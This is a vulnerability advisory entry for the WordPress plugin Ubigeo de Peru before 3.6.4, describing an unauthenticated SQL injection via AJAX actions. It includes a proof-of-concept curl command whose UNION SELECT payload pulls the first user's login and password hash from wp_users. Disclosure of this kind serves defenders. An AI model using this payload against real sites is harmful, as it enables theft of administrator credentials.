Lucene search

K
wpvulndbCydaveWPVDB-ID:FD84DC08-0079-4FCF-81C3-A61D652E3269
HistoryApr 18, 2022 - 12:00 a.m.

Ubigeo de Peru < 3.6.4 - Unauthenticated SQLi

2022-04-1800:00:00
cydave
wpscan.com
13
peru
sql injection
unauthenticated access
security vulnerability
ajax actions
wordpress

EPSS

0.04

Percentile

92.1%

The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections

PoC

curl https://example.com/wp-admin/admin-ajax.php \ --data β€˜action=rt_ubigeo_load_distritos_address&idProv;=1 UNION SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1) from wp_users#’

EPSS

0.04

Percentile

92.1%

Related for WPVDB-ID:FD84DC08-0079-4FCF-81C3-A61D652E3269